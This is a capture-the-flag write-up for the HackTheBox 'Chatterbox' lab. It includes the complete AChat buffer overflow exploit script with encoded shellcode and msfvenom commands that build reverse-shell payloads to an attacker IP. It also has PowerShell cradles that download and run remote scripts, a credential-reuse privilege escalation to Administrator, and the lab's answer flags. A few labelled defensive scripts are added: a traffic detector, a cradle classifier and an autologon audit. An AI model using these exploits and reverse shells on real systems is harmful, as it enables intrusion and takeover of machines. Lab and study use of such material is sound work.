HTB:Chatterbox[WriteUP]

Table of Contents

Connect to the HackTheBox server and spawn target machine

Information Collection

Use Rustscan to perform open-port scanning on the TCP ports of the target

Use Nmap to perform script and service scanning on the TCP ports of the target

Use curl to access ports 9255 and 9256 of the target

Exploiting Vulnerabilities

Use Searchsploit to search for Achat vulnerabilities

Running Metasploit

Copy the original exploitation script from searchsploit to the current directory

Audit this code

USER_FLAG:cb2084eeb0607f726c68709d13bd7f4d

Privilege Escalation

Running Metasploit again

I try to get a powershell shell

Use the function of the PowerUp script

Test password reuse against the administrator user with the runascs tool

ROOT_FLAG: 9c5919d1087f8c619f655b4d89148d40


Connect to the HackTheBox server and spawn target machine

Target_IP: 10.10.10.74

Attacker_IP: 10.10.16.8


Information Collection

Use Rustscan to perform open-port scanning on the TCP ports of the target

rustscan -a 10.10.10.74 -r 1-65535 --ulimit 5000 | tee res.txt

Extract the ports from the results using the grep, awk and paste commands and assign them to the $ports variable

ports=$(grep syn-ack res.txt | awk -F/ '{print $1}' | paste -sd ',')

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# grep syn-ack res.txt | awk -F/ '{print $1}' | paste -sd ','   
135,139,445,9255,9256,49152,49153,49154,49155,49156,49157
                                                                                          
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ports=$(grep syn-ack res.txt | awk -F/ '{print $1}' | paste -sd ',')

Use Nmap to perform script and service scanning on the TCP ports of the target

nmap -p$ports -sCV 10.10.10.74 

Use Nmap to scan the common UDP ports of the target

nmap -sU --top-ports 20 -Pn 10.10.10.74

Use Nmap to perform vulnerability scanning on the TCP ports of the target

nmap -p$ports --script=vuln 10.10.10.74

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p$ports --script=vuln 10.10.10.74
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 20:35 EST
Nmap scan report for 10.10.10.74
Host is up (0.12s latency).

PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
9255/tcp  open  mon
9256/tcp  open  unknown
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 117.50 seconds

Use curl to access ports 9255 and 9256 of the target

curl -v http://10.10.10.74:9255
curl -v http://10.10.10.74:9256 --http0.9

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -v http://10.10.10.74:9255
*   Trying 10.10.10.74:9255...
* Connected to 10.10.10.74 (10.10.10.74) port 9255
* using HTTP/1.x
> GET / HTTP/1.1
> Host: 10.10.10.74:9255
> User-Agent: curl/8.10.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 204 No Content
< Connection: close
< Server: AChat
<
* shutting down connection #0

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -v http://10.10.10.74:9256 --http0.9
*   Trying 10.10.10.74:9256...
* Connected to 10.10.10.74 (10.10.10.74) port 9256
* using HTTP/1.x
> GET / HTTP/1.1
> Host: 10.10.10.74:9256
> User-Agent: curl/8.10.1
> Accept: */*
>
* Request completely sent off
ERROR
* shutting down connection #0


Exploiting Vulnerabilities

Use Searchsploit to search for Achat vulnerabilities

searchsploit achat

Because Metasploit already has an exploitation module for the buffer overflow vulnerability in this server, I decided to exploit it through Metasploit

Running Metasploit

msfconsole

Search for modules related to Achat

search achat

Switch to this module to exploit the Achat vulnerability

use exploit/windows/misc/achat_bof

Configure the LHOST, LPORT, RHOSTS, RPORT and PAYLOAD parameters properly, then enter exploit or run to launch the module

Obviously, it failed, so I tried to exploit this vulnerability manually

Copy the original exploitation script from searchsploit to the current directory

searchsploit -m 36025.py

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 36025.py
  Exploit: Achat 0.150 beta7 - Remote Buffer Overflow
      URL: https://www.exploit-db.com/exploits/36025
     Path: /usr/share/exploitdb/exploits/windows/remote/36025.py
    Codes: CVE-2015-1578, CVE-2015-1577, OSVDB-118206, OSVDB-118104
 Verified: False
File Type: Python script, ASCII text executable, with very long lines (637)
Copied to: /home/kali/Desktop/temp/36025.py

The searchsploit output gives some useful information about the exploitation script, such as the vulnerability numbers: CVE-2015-1578, CVE-2015-1577

Audit this code

#!/usr/bin/python
# Author KAhara MAnhara
# Achat 0.150 beta7 - Buffer Overflow
# Tested on Windows 7 32bit

import socket
import sys, time

# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
#Payload size: 512 bytes

buf =  ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x69\x6c\x77\x78\x62\x62"
buf += "\x69\x70\x59\x70\x4b\x50\x73\x30\x43\x59\x5a\x45\x50"
buf += "\x31\x67\x50\x4f\x74\x34\x4b\x50\x50\x4e\x50\x34\x4b"
buf += "\x30\x52\x7a\x6c\x74\x4b\x70\x52\x4e\x34\x64\x4b\x63"
buf += "\x42\x4f\x38\x4a\x6f\x38\x37\x6d\x7a\x4d\x56\x4d\x61"
buf += "\x49\x6f\x74\x6c\x4f\x4c\x6f\x71\x33\x4c\x69\x72\x4e"
buf += "\x4c\x4f\x30\x66\x61\x58\x4f\x5a\x6d\x59\x71\x67\x57"
buf += "\x68\x62\x48\x72\x52\x32\x50\x57\x54\x4b\x72\x32\x4e"
buf += "\x30\x64\x4b\x6e\x6a\x4d\x6c\x72\x6b\x70\x4c\x4a\x71"
buf += "\x43\x48\x39\x53\x71\x38\x6a\x61\x36\x71\x4f\x61\x62"
buf += "\x6b\x42\x39\x4f\x30\x4a\x61\x38\x53\x62\x6b\x30\x49"
buf += "\x6b\x68\x58\x63\x4e\x5a\x6e\x69\x44\x4b\x6f\x44\x72"
buf += "\x6b\x4b\x51\x36\x76\x70\x31\x69\x6f\x46\x4c\x57\x51"
buf += "\x48\x4f\x4c\x4d\x6a\x61\x55\x77\x4f\x48\x57\x70\x54"
buf += "\x35\x49\x66\x49\x73\x51\x6d\x7a\x58\x6d\x6b\x53\x4d"
buf += "\x4e\x44\x34\x35\x38\x64\x62\x38\x62\x6b\x52\x38\x6b"
buf += "\x74\x69\x71\x4a\x33\x33\x36\x54\x4b\x7a\x6c\x6e\x6b"
buf += "\x72\x6b\x51\x48\x6d\x4c\x6b\x51\x67\x63\x52\x6b\x49"
buf += "\x74\x72\x6b\x4d\x31\x7a\x30\x44\x49\x51\x34\x6e\x44"
buf += "\x4b\x74\x61\x4b\x51\x4b\x4f\x71\x51\x49\x71\x4a\x52"
buf += "\x31\x49\x6f\x69\x50\x31\x4f\x51\x4f\x6e\x7a\x34\x4b"
buf += "\x6a\x72\x38\x6b\x44\x4d\x71\x4d\x50\x6a\x59\x71\x64"
buf += "\x4d\x35\x35\x65\x62\x4b\x50\x49\x70\x4b\x50\x52\x30"
buf += "\x32\x48\x6c\x71\x64\x4b\x72\x4f\x51\x77\x59\x6f\x79"
buf += "\x45\x45\x6b\x48\x70\x75\x65\x35\x52\x30\x56\x72\x48"
buf += "\x33\x76\x35\x45\x37\x4d\x63\x6d\x49\x6f\x37\x65\x6d"
buf += "\x6c\x6a\x66\x31\x6c\x79\x7a\x51\x70\x4b\x4b\x67\x70"
buf += "\x53\x45\x6d\x35\x55\x6b\x31\x37\x4e\x33\x32\x52\x30"
buf += "\x6f\x42\x4a\x6d\x30\x50\x53\x79\x6f\x37\x65\x70\x63"
buf += "\x53\x31\x72\x4c\x30\x63\x4c\x6e\x70\x65\x32\x58\x50"
buf += "\x65\x6d\x30\x41\x41"

# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('192.168.91.130', 9256)

fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p  = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"

print "---->{P00F}!"
i=0
while i<len(p):
    if i > 172000:
        time.sleep(1.0)
    sent = sock.sendto(p[i:(i+8192)], server_address)
    i += sent
sock.close()
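
Seen from the defending side, the script above sends one very large message to UDP 9256 in 8192-byte datagrams, opening with the A0000000002#Main header and long runs of a single filler byte. The following detector is an added example, not part of 36025.py or the original write-up; both thresholds and the sample traffic are assumptions constructed for illustration.

```python
# Added example, not part of 36025.py: heuristic detector for the traffic
# shape that script produces against AChat's UDP listener.
from collections import defaultdict

ACHAT_UDP_PORT = 9256                  # UDP port the script on this page sends to
MSG_PREFIX = b"A0000000002#Main\x00"   # message header used by the script
MAX_STREAM_BYTES = 16 * 1024           # ASSUMPTION: ceiling for a normal chat burst
MIN_FILLER_RUN = 512                   # ASSUMPTION: repeated-byte run treated as padding


def longest_run(data: bytes) -> int:
    """Return the length of the longest run of one repeated byte."""
    best = run = 0
    prev = None
    for b in data:
        run = run + 1 if b == prev else 1
        prev = b
        if run > best:
            best = run
    return best


def detect(datagrams):
    """datagrams: iterable of (src_ip, dst_port, payload). Returns {src_ip: [reasons]}."""
    total = defaultdict(int)
    reasons = defaultdict(set)
    for src, dport, payload in datagrams:
        if dport != ACHAT_UDP_PORT:
            continue
        total[src] += len(payload)
        if payload.startswith(MSG_PREFIX) and longest_run(payload) >= MIN_FILLER_RUN:
            reasons[src].add("message header followed by long single-byte filler")
        if total[src] > MAX_STREAM_BYTES:
            reasons[src].add("oversized datagram stream")
    return {src: sorted(r) for src, r in reasons.items()}


# Constructed sample traffic (filler bytes only, nothing copied from the script's payload).
SAMPLE = [
    ("10.10.10.20", 9256, MSG_PREFIX + b"hello\x00"),   # short message, constructed
    ("10.10.10.20", 137, b"\x00" * 2000),               # other port, ignored
    ("10.10.16.8", 9256, MSG_PREFIX + b"Z" * (8192 - len(MSG_PREFIX))),
    ("10.10.16.8", 9256, b"Z" * 8192),
    ("10.10.16.8", 9256, b"Z" * 8192),
]

if __name__ == "__main__":
    for src, why in detect(SAMPLE).items():
        print(src, "->", "; ".join(why))
```

The per-source byte counter here never resets; a deployed version would count inside a short time window.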

Apparently, we need to generate a trojan and put its hexadecimal data into the exploitation script

I modified the command that generates the trojan so that I can get a reverse shell rather than a calculator :)

msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.16.8 LPORT=1425 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python | tee buf.txt

Copy all lines starting with buf, then paste them into the exploitation script in place of the original ones

Extract the buf lines into a new file

grep buf buf.txt > buf_new.txt

Delete the original buf string section in the script

Insert the buf string at line 12 of the exploitation script

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ex -s 36025.py << EOF
heredoc> 12read buf_new.txt
heredoc> wq                                                                                          
heredoc> EOF

Once the buf string has been inserted successfully, we still need to modify the victim IP address

Start listening locally using nc

rlwrap -cAr nc -lvnp 1425

Run the exploitation script with python2

python2 36025.py

Successfully obtained the target reverse shell

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# rlwrap -cAr nc -lvnp 1425                      
listening on [any] 1425 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.10.74] 49167
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
chatterbox\alfred

Find the location of user_flag and view its contents

C:\Windows\system32>cd c:\
cd c:\

c:\>dir /s user.txt
dir /s user.txt
 Volume in drive C has no label.
 Volume Serial Number is 502F-F304

 Directory of c:\Users\Alfred\Desktop

11/26/2024  05:58 AM                34 user.txt
               1 File(s)             34 bytes

     Total Files Listed:
               1 File(s)             34 bytes
               0 Dir(s)   3,348,357,120 bytes free

c:\>type "c:\Users\Alfred\Desktop\user.txt"
type "c:\Users\Alfred\Desktop\user.txt"
cb2084eeb0607f726c68709d13bd7f4d

USER_FLAG:cb2084eeb0607f726c68709d13bd7f4d


Privilege Escalation

I try to get an administrator shell automatically with Metasploit. First, generate an MSF trojan

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=10.10.16.8 LPORT=4444 -f exe > shell.exe

Second, I create a temp share so that the victim machine can download my trojan

impacket-smbserver temp . -smb2support -username temp -password temp

On the victim machine, enter a low-privilege directory, for example C:\Users\Alfred\Desktop

cd C:\Users\Alfred\Desktop

Download the trojan from the attacker machine using the copy command

copy \\10.10.16.8\temp\shell.exe shell.exe

C:\Users\Alfred\Desktop>copy \\10.10.16.8\temp\shell.exe shell.exe
copy \\10.10.16.8\temp\shell.exe shell.exe
        1 file(s) copied.

C:\Users\Alfred\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 502F-F304

 Directory of C:\Users\Alfred\Desktop

11/26/2024  07:44 AM    <DIR>          .
11/26/2024  07:44 AM    <DIR>          ..
11/26/2024  02:51 AM            73,802 shell.exe
11/26/2024  07:34 AM                34 user.txt
               2 File(s)         73,836 bytes
               2 Dir(s)   3,667,869,696 bytes free

After the download completes, cut off the connection to the attacker machine's SMB server

net use \\10.10.16.8\temp /delete

Running Metasploit again

msfconsole

Switch to the generic listener module

use exploit/multi/handler

Configure the LHOST, LPORT and PAYLOAD parameters properly and enter exploit or run to start the module

C:\Users\Alfred\Desktop>cmd.exe /c .\shell.exe
cmd.exe /c .\shell.exe

C:\Users\Alfred\Desktop>cmd.exe /c .\shell.exe
cmd.exe /c .\shell.exe

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.8:4444

I'm sure nothing happened here, but I don't know where the problem is :(

I try to get a powershell shell

msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.16.9/shell.ps1')\"" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

Open a port on the attacker machine to serve Invoke-PowerShellTcp.ps1

php -S 0:80

Insert the hexadecimal data into the exploitation script and run the script

python2 36025.py

Then the HTTP server logs a request and the local nc shows output as well

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# php -S 0:80
[Tue Nov 26 21:42:36 2024] PHP 8.2.24 Development Server (http://0:80) started
[Tue Nov 26 21:44:17 2024] 10.10.10.74:49162 Accepted
[Tue Nov 26 21:44:17 2024] 10.10.10.74:49162 [200]: GET /shell.ps1
[Tue Nov 26 21:44:17 2024] 10.10.10.74:49162 Closing

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# rlwrap -cAr nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.9] from (UNKNOWN) [10.10.10.74] 49165
Windows PowerShell running as user Alfred on CHATTERBOX
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
chatterbox\alfred
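
Both PowerShell stages on this page use the same download cradle, so a defender can look for it in process command lines and script-block logs. The following classifier is an added example, not code from the original write-up; the first two sample lines are the commands shown on this page and the rest are constructed.

```python
# Added example, not from the write-up: classify command lines or script-block
# text that fetch remote code, as the two cradles on this page do.
import re

ESCAPES = re.compile("[`^\"']")   # quoting/escape characters ignored by cmd or PowerShell
FETCH = re.compile(r"\.download(string|data|file)\s*\(|\b(invoke-webrequest|iwr)\b")
EXEC = re.compile(r"\b(iex|invoke-expression)\b")
URL = re.compile(r"https?://[^\s),]+", re.I)


def classify(text: str):
    """Return None for unrelated text, else {'verdict': ..., 'urls': [...]}."""
    flat = ESCAPES.sub("", text)          # undo quote and escape tricks
    low = flat.lower()                    # PowerShell is case-insensitive
    if not FETCH.search(low):
        return None
    verdict = "download-and-execute" if EXEC.search(low) else "download-only"
    return {"verdict": verdict, "urls": URL.findall(flat)}


def scan(lines):
    """Return (index, verdict, urls) for every line that matches."""
    hits = []
    for i, line in enumerate(lines):
        res = classify(line)
        if res:
            hits.append((i, res["verdict"], res["urls"]))
    return hits


# Lines 0-1 are the commands from this page; lines 2-5 are constructed.
SAMPLE = [
    "powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.16.9/shell.ps1')\"",
    "iex(new-object net.webclient).downloadstring('http://10.10.16.9/PowerUp.ps1')",
    "powershell -c \"Invoke-Expression (New-Object Net.WebClient).Down`loadString('http://10.10.16.9/shell.ps1')\"",
    "powershell (New-Object Net.WebClient).DownloadFile('http://10.10.16.9/runascs.exe','runascs.exe')",
    "powershell Get-Content C:\\logs\\iexplore.log",
    "powershell -File C:\\Scripts\\backup.ps1",
]

if __name__ == "__main__":
    for idx, verdict, urls in scan(SAMPLE):
        print(idx, verdict, urls)
```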

Have the victim machine load the PowerUp automation script from the attacker machine

iex(new-object net.webclient).downloadstring('http://10.10.16.9/PowerUp.ps1')

Use the function of the PowerUp script

Invoke-AllChecks

PS C:\Users\Alfred\Desktop> iex(new-object net.webclient).downloadstring('http://10.10.16.9/PowerUp.ps1')

PS C:\Users\Alfred\Desktop> Invoke-AllChecks


DefaultDomainName    :
DefaultUserName      : Alfred
DefaultPassword      : Welcome1!
AltDefaultDomainName :
AltDefaultUserName   :
AltDefaultPassword   :
Check                : Registry Autologons

UnattendPath : C:\Windows\Panther\Unattend.xml
Name         : C:\Windows\Panther\Unattend.xml
Check        : Unattended Install Files

We got the Alfred user's credentials

UserName: Alfred

UserPassword: Welcome1!
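
PowerUp's "Registry Autologons" check reads the Winlogon autologon values, and an administrator can run the same audit before an attacker does. The following script is an added example, not code from the original write-up or from PowerUp; the sample text is constructed in the shape of reg query output, and its AutoAdminLogon value is an assumption that does not appear on this page.

```python
# Added example, not from the write-up: audit the Winlogon autologon values
# that PowerUp's "Registry Autologons" check reported above.
import re
import subprocess

WINLOGON = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
VALUE_LINE = re.compile(r"^\s{4}(\S.*?)\s{4}(REG_\w+)(?:\s{4}(.*))?$")
PAIRS = (("DefaultUserName", "DefaultPassword"),
         ("AltDefaultUserName", "AltDefaultPassword"))


def parse_reg_query(text):
    """Parse `reg query` output into {value_name: data}."""
    values = {}
    for line in text.splitlines():
        m = VALUE_LINE.match(line.rstrip())
        if m:
            values[m.group(1)] = (m.group(3) or "").strip()
    return values


def audit(values):
    """Return findings without echoing the password itself."""
    findings = []
    for user_key, pw_key in PAIRS:
        pw = values.get(pw_key, "")
        if pw:
            user = values.get(user_key) or "<unknown>"
            findings.append(
                f"{pw_key}: plaintext password ({len(pw)} chars) stored for {user}")
    if findings and values.get("AutoAdminLogon") == "1":
        findings.append("AutoAdminLogon=1: automatic logon is enabled")
    return findings


def read_live():
    """Windows only: query the real key (not exercised by the sample below)."""
    out = subprocess.run(["reg", "query", WINLOGON],
                         capture_output=True, text=True, check=True)
    return parse_reg_query(out.stdout)


# Constructed sample; user name and password mirror the PowerUp result on this
# page, AutoAdminLogon is an assumed value.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultDomainName    REG_SZ
    DefaultUserName    REG_SZ    Alfred
    DefaultPassword    REG_SZ    Welcome1!
    Shell    REG_SZ    explorer.exe
"""

if __name__ == "__main__":
    for finding in audit(parse_reg_query(SAMPLE)):
        print("[!]", finding)
```

Removing the value is only half of the fix: the write-up goes on to show the same password being accepted for the Administrator account, so it has to be rotated there as well.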

I try to start the WinRM service, but it fails

enable-psremoting -force
set-wsmanquickconfig -force

PS C:\Users\Alfred\Desktop> enable-psremoting -force
PS C:\Users\Alfred\Desktop> Invoke-PowerShellTcp : Access is denied. You need to run this cmdlet from an el
evated process.
At line:127 char:21
+ Invoke-PowerShellTcp <<<<  -Reverse -IPAddress 10.10.16.9 -Port 1425
    + CategoryInfo          : NotSpecified: (:) [Write-Error], WriteErrorExcep
   tion
    + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorExceptio
   n,Invoke-PowerShellTcp
 

PS C:\Users\Alfred\Desktop> set-wsmanquickconfig -force
PS C:\Users\Alfred\Desktop> Invoke-PowerShellTcp : Access is denied. You need to run this cmdlet from an el
evated process.
At line:127 char:21
+ Invoke-PowerShellTcp <<<<  -Reverse -IPAddress 10.10.16.9 -Port 1425
    + CategoryInfo          : NotSpecified: (:) [Write-Error], WriteErrorExcep
   tion
    + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorExceptio
   n,Invoke-PowerShellTcp

I copy the runascs tool from the attacker machine to the victim machine

PS C:\Users\Alfred\Desktop> PS C:\Users\Alfred\Desktop> net use \\10.10.16.9\temp /user:temp temp
The command completed successfully.

PS C:\Users\Alfred\Desktop> copy \\10.10.16.9\temp\runascs.exe ./runascs.exe
PS C:\Users\Alfred\Desktop> dir


    Directory: C:\Users\Alfred\Desktop


Mode                LastWriteTime     Length Name                              
----                -------------     ------ ----                              
-a---        11/26/2024  10:36 PM      51712 runascs.exe                       
-ar--        11/26/2024   3:21 PM         34 user.txt

View users in the victim system

net user

PS C:\Users\Alfred\Desktop> net user

User accounts for \\CHATTERBOX

-------------------------------------------------------------------------------
Administrator            Alfred                   Guest                    
The command completed successfully.

PS C:\Users\Alfred\Desktop> wget http://10.10.16.9/runascs.exe -O runascs.exe

User accounts for \\CHATTERBOX

-------------------------------------------------------------------------------
Administrator            Alfred                   Guest                    
The command completed successfully.

On the local side, nc starts listening on port 1426

rlwrap -cAr nc -lvnp 1426

Test password reuse against the administrator user with the runascs tool

.\runascs.exe administrator 'Welcome1!' powershell -r 10.10.16.9:1426 -t 0

We successfully got the Administrator user's shell!

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# rlwrap -cAr nc -lvnp 1426
listening on [any] 1426 ...
connect to [10.10.16.9] from (UNKNOWN) [10.10.10.74] 49181
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
chatterbox\administrator

Finally, find the root_flag location and view its content

C:\Windows\system32>cd c:\
cd c:\

c:\>dir /s root.txt
dir /s root.txt
 Volume in drive C has no label.
 Volume Serial Number is 502F-F304

 Directory of c:\Users\Administrator\Desktop

11/26/2024  03:21 PM                34 root.txt
               1 File(s)             34 bytes

     Total Files Listed:
               1 File(s)             34 bytes
               0 Dir(s)   3,346,296,832 bytes free

c:\>type "c:\Users\Administrator\Desktop\root.txt"
type "c:\Users\Administrator\Desktop\root.txt"
9c5919d1087f8c619f655b4d89148d40

ROOT_FLAG: 9c5919d1087f8c619f655b4d89148d40
